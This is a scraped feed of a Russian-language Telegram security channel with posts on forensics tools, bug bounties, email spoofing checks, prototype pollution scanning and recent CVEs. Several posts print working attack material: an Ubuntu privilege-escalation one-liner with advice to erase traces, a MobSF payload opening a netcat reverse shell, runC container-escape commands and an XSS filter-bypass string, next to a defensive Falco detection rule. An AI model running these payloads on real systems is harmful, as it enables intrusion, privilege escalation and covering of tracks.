Похек
17K subscribers
2.13K photos
111 videos
243 files
3.09K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @szybnev или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
⌨️ Кто это ваша форензика?
#форензика #forensic #windows #powershell

❤️ Если честно, то никогда не увлекался форензикой. Был только 1 раз опыт во время WordSkills Russia (когда он ещё был). Тогда с другом искали флаг и pcap файлике, причем оба ничего в этом не понимали и даже флагов для Wireshark не знал. Хотя сейчас понимаю, что это был started таск по форензике на любой CTF.

Но вот недавно листая интернеты наткнулся на интересную гитхаб репу, которая на мой взгляд сильно облегчает работу любому форензику, особенно начинающему — MemProcFS-Analyzer.

❤️ Собственно MemProcFS расшифровывается как The Memory Process File System, а MemProcFS-Analyzer это форк оригинального проекта с C на PowerShell, что несомненно более user-friendly.

❤️ Если вас заинтересует азы темы анализа физической памяти, то советую посмотреть MemProcFS - This Changes Everything. Также есть полноценный доклад про форензику памяти и про DMA атаку. А также есть канал с live демо видео, как изучать виртуальную память. Советую к просмотру всем заинтересованным.

❤️ Вперед в прошлое. Автор видео показывает, как можно вытащить пароль от FileVault2 на MacOS. Интересный опыт из прошлого.

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
7🌚2
Ubuntu Privilege escalation
CVE-2023-32629 & CVE-2023-2640

#linux #LPE #полезное

PoC:
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*; python3 -c 'import os;os.setuid(0);os.system(\"/bin/bash\")'"


📌 Не забывайте убрать следы эксплуатации (папки l u w m):
rm -rf l u w m


🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
15🌚441
Forwarded from wr3dmast3r vs pentest
Вы когда нибудь задумывались, как может выглядеть гонка состояний на клиентской стороне в DOM-модели? 😳

Сегодня я постараюсь рассказать, как можно раскрутить Self-XSS, используя её в комбинации с CSRF, Race Condition и свойством window.opener, благодаря которому, в свою очередь, можно проводить фишинговые атаки на пользователей. 😈

https://telegra.ph/XSS-Advanced-Level-pt2-02-01
Please open Telegram to view this post
VIEW IN TELEGRAM
511
Forwarded from SecuriXy.kz
#CVE-2024-21633 - #MobSF Remote code execution (#RCE)

MobSF - статический анализатор приложений: Android, Apple iOS и Windows Phone и динамический анализ: только приложения Android.

Пересобрав приложение с ночинкой в res/raw/jadx к примерутакого содержания:


#!/bin/bash
nc host.docker.internal 9001 -e sh

Можно получить реверс шелл с хоста на котором стоит анализатор, из-за фичи самого MobSF который позволяет записать что угодно по относительному пути ${decode target path}/res/

https://www.qu35t.pw/posts/2024-21633-mobsf-rce/

https://github.com/0x33c0unt/CVE-2024-21633
7
ModSecurity WAF Bypass
CVE-2024-1019


Недавно была обнаружена значительная уязвимость в ModSecurity версий 3.0.0 - 3.0.11, идентифицированная как CVE-2024-1019. Эта уязвимость, получившая оценку CVSS 8.6, представляет серьезную опасность, позволяя обойти WAF для полезной нагрузки, основанной на пути в URL-адресах запросов.
Злоумышленники могут использовать CVE-2024-1019, создавая URL-адреса запросов с кодированными в процентах вопросительными знаками (%3F). Когда ModSecurity декодирует такие URL, он ошибочно определяет позицию компонента запроса, что позволяет злоумышленнику стратегически разместить полезную нагрузку в пути URL, чтобы обойти правила ModSecurity, предназначенные для проверки компонентов пути.

Данная проблема затрагивает переменные REQUEST_FILENAME и REQUEST_BASENAME, которые используются для проверки путей. Следовательно, правила, опирающиеся на эти переменные, могут оказаться неэффективными в борьбе с этим эксплойтом.

Пользователям и интеграторам ModSecurity настоятельно рекомендуется обновиться до версии 3.0.12, в которой эта уязвимость устранена. Важно отметить, что ModSecurity v2, а именно v2.9.x, остается незатронутой этим багом.

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
12🌚11
Forwarded from Standoff 365
🔥 Positive Technologies запускает багбаунти на 60 млн рублей!

В программу Positive Dream Hunting добавлено второе недопустимое событие — внедрение закладки в код продуктов Positive Technologies.

Вознаграждение получит багхантер (или команда), который сможет разместить условно вредоносную рабочую сборку с потенциально зловредным кодом на внутреннем сервере обновлений gus.ptsecurity.com либо публичных серверах update.ptsecurity.com.

Белым хакерам, которые выполнят один или несколько шагов до потенциальной реализации недопустимого события, будет присуждаться поощрительное вознаграждение. В частности:

300–500 тыс. рублей — за преодоление сетевого периметра и закрепление на узле

3–5 млн рублей — за внедрение кода в публичный релиз продукта на этапе хранения или тестирования

Все условия программы можно найти на нашем сайте.

Кроме того, Positive Technologies увеличивает вознаграждение за реализацию первого недопустимого события — кражу денег со счетов — до 60 млн рублей. До сих пор выполнить сценарий полностью не смог ни один багхантер.

😏 Испытать свои силы можно здесь: https://bugbounty.standoff365.com/programs/ptsecurity_ns/
6🌚21
Учимся ломать мобилки с Frida Labs
#мобилки #mobile_pentest

Когда-то я выложил супер залётный мем, который собрал по меньшей мере 18к просмотров без учетов того момента, когда у меня его своровали. И кроме того, что шутить про мобилки я только знаю какие ЯП/фреймворки используются и базовые тулзы. Но если вам по работе надо изучить мобилки или вы только учитесь и решили выбрать это очень интересное направление где сильно меньше конкуренции, чем в вебе. Frida является основополагающим инструментом при пентесте мобилки. Если ты ранее не пользовался Frida то тебе очень полезна будет Frida Labs.

Содержание репозитория:
Challenge 0x1 : Frida setup, Hooking a method
Challenge 0x2 : Calling a static method
Challenge 0x3 : Changing the value of a variable
Challenge 0x4 : Creating a class instance
Challenge 0x5 : Invoking methods on an existing instance
Challenge 0x6 : Invoking a method with an object argument
Challenge 0x7 : Hooking the constructor
Challenge 0x8 : Introduction to native hooking
Challenge 0x9 : Changing the return value of a native function
Challenge 0xA : Calling a native function
Challenge 0xB : Patching instructions using X86Writer and ARM64Writer

Полезные ресурсы от автора репы:
https://learnfrida.info/advanced_usage
https://codeshare.frida.re

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
11🌚221
Ultimate_Flipper_Zero_CheatSheet_Hack_&_Secure_InfoSec_Write_ups.pdf
3.6 MB
Признайтесь честно, у кого Flipper лежит в шкафу/полке и просто пылиться?
#полезное

🔥 Всем обладателям флипера советую почитать: The Ultimate Guide / CheatSheet to Flipper Zero

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
11
Привет, охотники!

Мы с приятными новостями: повысили награды в направлении «Умные устройства с Алисой» и заодно обновили приоритеты по устройствам. За критичные отчёты теперь можно получить до 1 млн рублей

За что можно получить такую награду? Например, если вы смогли найти способ удалённо выполнять команды на новой колонке и поморгать светодиодами :)

А если сценарий эксплуатации потребует участия пользователя или локальный доступ к устройству — то такая находка попадёт в категорию, где критичность ниже.

Впрочем, в скоупе программы не только сами устройства и их прошивки, но и сопутствующие веб-сервисы. Так что попробовать поискать баги смогут не только реверсеры и исследователи железа, но и любители веба — и найти что-то на стыке офлайна с онлайном ;)

Удачной охоты! 🔥
Please open Telegram to view this post
VIEW IN TELEGRAM
1
А вы проверяете DNS записи? (DNSSEC привет)

🌱 Давайте разберем что мы сможем найти, если будет их проверять. Самое вкусное, если у будут отсутствовать SPF и DMARC, это победа на 90%. Но давайте сначала разберем, что это за DNS записи.

1️⃣ SPF — это стандарт, который позволяет владельцам доменов указать, какие почтовые серверы авторизованы для отправки почты от их имени. Запись SPF публикуется в DNS в виде TXT-записи и содержит список IP-адресов, которые разрешены отправлять письма от имени домена. Когда почтовый сервер получает входящее сообщение, он может проверить SPF-запись отправителя, чтобы убедиться, что IP-адрес, с которого было отправлено сообщение, авторизован. Если сообщение было отправлено с сервера, не включенного в SPF-запись, оно может быть отмечено как подозрительное или отклонено.

2️⃣ DMARC — это стандарт, который позволяет владельцу домена указать, какие меры должны быть приняты, если сообщение не прошло проверку SPF или DKIM (еще один стандарт аутентификации). Запись DMARC также публикуется в DNS как TXT-запись и указывает политику, которая должна использоваться для обработки нелегитимных сообщений, а также адрес электронной почты для отправки отчетов о письмах, которые не прошли проверку.

➡️ Как итог мы получаем возможность отправлять email'ы от лица другой компании. Но скоупы у нас частенько составляют больше 20 доменов и проверять всё руками как-то не очень.

🔧 Поэтому делюсь с вами классной тулзой, которая автоматизирует эту рутинную задачу - Spoofy. Инструмент проверяет можно ли спуфать электронную почту на основе SPF и DMARC записей.

Предустановка:
git clone https://github.com/MattKeeley/Spoofy; cd Spoofy; pip3 install -r requirements.txt


Установка максимально простая:
./spoofy.py -d [DOMAIN] -o [stdout or xls]

./spoofy.py -iL [DOMAIN_LIST] -o [stdout or xls]


Тулза подходит для 🔴 🔵 команд

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
1
Forwarded from Заметки Слонсера (Slonser)
Уже в эти выходные моя команда проводит GoldCTF 2024.
Будет очень сложный Attack/Defence, приглашаю всех поучаствовать.
https://ctftime.org/event/2249
Forwarded from Blue (h/c)at Café (Женя Белкин '";DROP DATABASE db_name();--)
🖼️ Container security или почему нужно следить не только за уязвимостями в коде

Немного отвлекусь от повседневности и хочу рассказать про то, как нам важно иметь безопасные контейнеры. Начну с того, что Вам и так известно, недавно был найден скоуп уязвимостей Docker и runC.

Для начала что это за уязвимости:

🟡 CVE-2024–21626 (CVSSv3: 8.6) — Проблема в runC, связанная с process.cwd и утечкой дескрипторов файлов.
🟡 CVE-2024–23651 (CVSSv3: 8.7) — Состояние гонки во время сборки, приводящее к выходу контейнера из строя в BuildKit.
🟡 CVE-2024–23652 (CVSSv3: 10.0) — Произвольное удаление при разрушении контейнера во время сборки BuildKit.
🟡 CVE-2024–23653 (CVSSv3: 9.8) — Проблема проверки привилегий GRPC SecurityMode в BuildKit, приводящая к выходу контейнера из строя во время сборки.

При подготовке поста мне очень понравилось читать исследование про CVE-2024–21626, прошу всех с ним ознакомиться - ТЫК

Могу сделать отдельный перевод в teletype 🚶‍♀️


CVE-2024-21626, в частности, привлекла внимание к уязвимостям в runC, ключевом компоненте различных систем управления контейнерами с открытым исходным кодом. Эта уязвимость, а также ее аналоги в BuildKit подчеркивают проблемы, связанные с обеспечением безопасности контейнеров и всей современной микросервисной инфраструктуре.

🤨Да кто этот ваш такой RunC?

RunC - это стандартное время выполнения контейнеров. Это базовая технология, используемая в Docker и других платформах для запуска контейнеров. По сути, runC отвечает за порождение и запуск контейнеров в соответствии со спецификацией Open Container Initiative (OCI). Для этого он предоставляет интерфейс командной строки для управления жизненным циклом контейнеров.

Суть CVE-2024-21626 заключается в утечке дескриптора файла в пакете runC. Эта проблема возникает во время выполнения контейнерного кода. Хотя пользователи обычно устанавливают закрытие дескрипторов файлов при выполнении (O_CLOEXEC) для предотвращения утечки, уязвимость существует в том, как runC обрабатывает системный вызов setcwd(2). Сложно, непонятно, но вот ссылки на видосы исполнения от Snyk ТЫК и на гите ТЫК

⌨️ Как ломать (Для RedTeam)

Эксплойт через запуск контейнера
Нет необходимости создавать собственный образ, просто запустите контейнер с параметром -w:
docker run -w /proc/self/fd/8 --name cve-2024-21626 --rm -it debian:bookworm


Эксплоит через выполнение в запущенном контейнере:
~/container/runc/runc --version
docker run --name helper-ctr alpine
docker export helper-ctr --output alpine.tar
mkdir rootfs
tar xf alpine.tar -C rootfs
~/container/runc/runc spec
sed -ri 's#(\s*"cwd": )"(/)"#\1 "/proc/self/fd/7"#g' config.json
grep cwd config.json
sudo ~/container/runc/runc --log ./log.json run demo


🛡 Как обнаружить (Для BlueTeam)
Эксплойты имеют следующие особенности:
Контейнер запускает процесс execve(2) со специальным рабочим каталогом, который начинается с /proc/self/fd/.
Контейнер создает символические ссылки через symlink(2) или symlinkat(2) со специальной ссылкой на целевой каталог, который начинается с /proc/self/fd/.
Контейнер будет открывать файлы с помощью open(2), openat(2) или openat2(2) с именами типа /proc/\d+/cwd/.*.

Правило для Falco — про него выйдет отдельный пост
- macro: container
condition: (container.id != host and container.name exists)

- rule: CVE-2024-21626 (runC escape through /proc/[PID]/cwd) exploited
desc: >
Detect CVE-2024-21626, runC escape vulerability through /proc/[PID]/cwd.
condition: >
container and ((evt.type = execve and proc.cwd startswith "/proc/self/fd") or (evt.type in (open, openat, openat2) and fd.name glob "/proc/*/cwd/*") or (evt.type in (symlink, symlinkat) and fs.path.target startswith "/proc/self/fd/")) and proc.name != "runc:[1:CHILD]"
output: CVE-2024-21626 exploited (%container.info evt_type=%evt.type process=%proc.name command=%proc.cmdline target=%fs.path.targetraw)
priority: CRITICAL


Это первая часть поста, телега не позволяет дать больше информации. Вторая часть выйдет завтра, в 15:00
Всех ждем на продолжение на уязвимости CVE-2024–23651, CVE-2024–23652, CVE-2024–23653 🤗
Please open Telegram to view this post
VIEW IN TELEGRAM
165
История о багах и о том, как фикс одних багов, создает новые баги 😂

Много видел постов про суперкритичную вулну в Ivanti. В целом интересная уязвимость, но это только верхушка айсберга.

Поэтому решил поделиться не просто PoC, но и ресерчом от AttackerKB (создатели metasploit). Они интересно и понятно объясни, как нашли и как работает злополучная SSRF в Ivanti Connect Secure, Ivanti Policy Secure, Ivanti Neurons for ZTA.

Но начнем мы не с CVE-2024-21893, а сделаем несколько шагов назад)

0️⃣ История с Ivanti началась с CVE-2023-46805, это был authentication bypass. Импакт очевиден, но ресерчеры на этом не остановились.

1️⃣ Далее они нашли command injection CVE-2024-21887. Это было вкуснее, к тому же чейнилось с предыдущей вулной на обход аутентификации. Что вылилось в unauthenticated RCE.

2️⃣ Ivanti пофиксили эти две CVE. Но официального патча на момент ещё не вышел.

3️⃣ Затем вышел официальный патч 1 февраля, но ресерчеры успели найти ту самую SSRF CVE-2024-21893 на день раньше, то бишь 31 января). Данная SSRF позволяет обойти патч двух предыдущих CVE (CVE-2023-46805 & CVE-2024-21887).

Есть ли в итоге исправление?
Да, конечно. В актуальной версии 22.5R2.2, на момент написания статьи, данные уязвимости были устранены. Но если у вас Ivanti Connect Secure 22.3R1 или старше, то рекомендую обновиться до актульной версии ASAP.

➡️ А для тех, кто хочет ещё глубже погрузится в этом, советую почитать полный ресерч.

Итог истории очевиден. Фикся одни баги, создаем другие)
🥺 Stay secure!

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
152
Forwarded from AP Security
#pentest #redteam

Идеальный DLL Hijacking🖥

Команда AP Security подготовила для Вас очередную статью, в которой подробно будет рассмотрено исследование такой техники, как DLL Hijacking. Статья подробно расскажет, как работает данный механизм и как его эксплуатировать

Хабр
Please open Telegram to view this post
VIEW IN TELEGRAM
114🌚32
Forwarded from Заметки Слонсера (Slonser)
Недавно нашел обход фильтрации тегов в golang.
Для строки <a/href/='https://google.com/#><img src=x onerror=alert()>slon</img></h1>'>google</a>, golang net/html увидит следующий DOM:
  html
head
body
a
->href: https://google.com/#><img src=x onerror=alert()>slon</img></h1>

То есть он будет думать что у нас есть только ссылка на google.com
В тоже время в браузере вы увидите, что у нас загрузился тег <img> и всплыл popup alert
Баг существует в последней версии golang и будет исправлен в next релизе.
12🌚4
Что общего у 50-секундного детектива, баскетболистов и разработки фишинговых атак
#история #фишинг

Спойлерить статью не буду, но редактор очень креативно подошла к теме Awareness. Поэтому всем советую почитать эту статью)

➡️ Читать далее

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
9🌚3
Forwarded from Багхантер
😎 Поступила инфа, что 18 апреля у VK намечается закрытая тусовка для багхантеров.

А еще узнали про условие, как туда можно попасть: любой багхантер, который сдаст четыре и более оплачиваемых отчета по программам VK на платформе Standoff 365 в срок с 12 февраля по 11 апреля, — получит приглашение на ивент.

А чтобы искать уязвимости было еще интереснее, VK увеличивает выплаты по программам: VK Play, Чемпионаты VK, VK Реклама, VK Pay и Оператор рекламных данных.

Сделай дело — туси смело: https://bugbounty.standoff365.com/vendors/vk/
8
Forwarded from BI.ZONE Bug Bounty
🪲 Сдавайте баги, чтобы попасть на закрытый ивент VK

Скоро VK проведет закрытое мероприятие для багхантеров. Пока никаких спойлеров: компания сама расскажет все подробности.

Зато уже сейчас у вас есть шанс получить проходку на ивент. Для этого нужно сдать как минимум четыре оплачиваемых бага с 12 февраля по 11 апреля. Успейте принять участие: количество мест ограниченно!

Но это еще не все: чтобы багхантить было приятнее, с 12 февраля VK повышает выплаты в своих программах.

🔵VK Pay — до 1,8 млн руб.
🔵Чемпионаты VK, «VK Реклама» — до 600 тыс. руб.
🔵VK Play, Оператор рекламных данных — до 360 тыс. руб.

Перейти на платформу
Please open Telegram to view this post
VIEW IN TELEGRAM
12
0 == "0" — TRUE

❤️ Prototype Pollution — это атака, с помощью которой изменяют прототип базовых объектов (Object.prototype, Function.prototype, Array.prototype) для модификации хода выполнения программы. Например, если код обращается к свойству window.foo и выполняет его содержимое с помощью eval, то в некоторых ситуациях можно добиться выполнения произвольного кода, переписав в прототипе объекта свойство foo (Object.prototype.foo = 'alert(1)'). Чаще всего на клиенте prototype pollution используется для реализации XSS с помощью изменения GET-параметров.

➡️ Тут можете более подробно почитать про Prototype Pollution

❤️ Но как же я могу вас оставить без автоматизации))

pphack

Прокаченный сканер на Prototype Pollution.

Установка:
go install github.com/edoardottt/pphack/cmd/pphack@latest


FAQ:
Usage:
pphack [flags]

Flags:
INPUT:
-u, -url string Input URL
-l, -list string File containing input URLs

CONFIGURATION:
-c, -concurrency int Concurrency level (default 50)
-t, -timeout int Connection timeout in seconds (default 10)
-px, -proxy string Set a proxy server (URL)
-rl, -rate-limit int Set a rate limit (per second)
-ua, -user-agent string Set a custom User Agent (random by default)

SCAN:
-p, -payload string Custom payload
-js, -javascript string Run custom Javascript on target
-jsf, -javascript-file string File containing custom Javascript to run on target

OUTPUT:
-o, -output string File to write output results
-v, -verbose Verbose output
-s, -silent Silent output. Print only results


Использование:
pphack -u https://edoardottt.github.io/pp-test/

pphack -l targets.txt

также вы можете встроить его в свой pipeline
echo https://edoardottt.github.io/pp-test/ | pphack

cat targets.txt | pphack


❤️ #You_have_been_poxeked

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
128